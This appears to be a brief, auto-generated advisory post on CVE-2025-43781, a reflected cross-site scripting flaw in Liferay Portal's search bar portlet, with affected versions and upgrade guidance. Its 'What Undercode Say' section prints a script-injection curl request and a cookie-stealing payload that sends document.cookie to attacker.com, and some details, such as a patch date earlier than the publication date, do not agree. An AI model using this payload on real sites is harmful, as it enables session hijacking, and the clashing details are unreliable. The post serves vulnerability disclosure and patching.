Liferay Portal, Reflected Cross-site Scripting, CVE-2025-43781 (MEDIUM)

Listen to this Post

This vulnerability is a reflected Cross-Site Scripting (XSS) flaw in the search bar portlet of Liferay Portal and Liferay DXP. The issue originates from the `getSearchURL()` method within the `SearchBarPortletDisplayContext` object, which returns a user-controlled URL value without proper sanitization. Specifically, the vulnerability exists in the `view.jsp` file where the unescaped output of `getSearchURL()` is rendered as the `action` attribute of an HTML `

` element. When an attacker crafts a URL containing malicious JavaScript and tricks a user into visiting it, the script is embedded into the page and executed in the victim’s browser context. The attack is ‘reflected’ because the malicious payload is delivered via a single HTTP request and immediately reflected back in the server’s response. Successful exploitation requires user interaction, as the victim must click the crafted link. The vulnerability stems from improper neutralization of user input during web page generation, classified as CWE-79.

dailycve form

Platform: Liferay Portal/DXP
Version: 7.4.3.110-7.4.3.128
Vulnerability: Reflected XSS
Severity: Medium (5.3)
date: 2025-09-09

Prediction: Patched 2025-04-10

What Undercode Say

curl -i "http://<target>/group/guest/search?_struts_action=/search/search" --data-urlencode "keywords=<script>alert('XSS')</script>"
<!-- Malicious payload for URL parameter -->
<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
Check application version for patch
grep "liferay.version" portal-ext.properties

How Exploit

  1. Attacker constructs a malicious URL embedding a script payload in a search parameter.
  2. The attacker socially engineers a victim to click the link (e.g., via email).
  3. The vulnerable portlet includes the unescaped payload in the page’s form action.
  4. The victim’s browser receives the page and executes the attacker’s script.

Protection from this CVE

Upgrade to Liferay Portal 7.4.3.129.

Upgrade to Liferay DXP 2024.Q1.13, 2024.Q3.9, or 2024.Q4.0.

Implement a WAF rule to filter XSS patterns in URLs.

Impact

CVSS:4.0 Score: 5.3 Medium.

Consequences: Session hijacking, credential theft, defacement.

Scope: Attack affects user’s browser, not the server.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top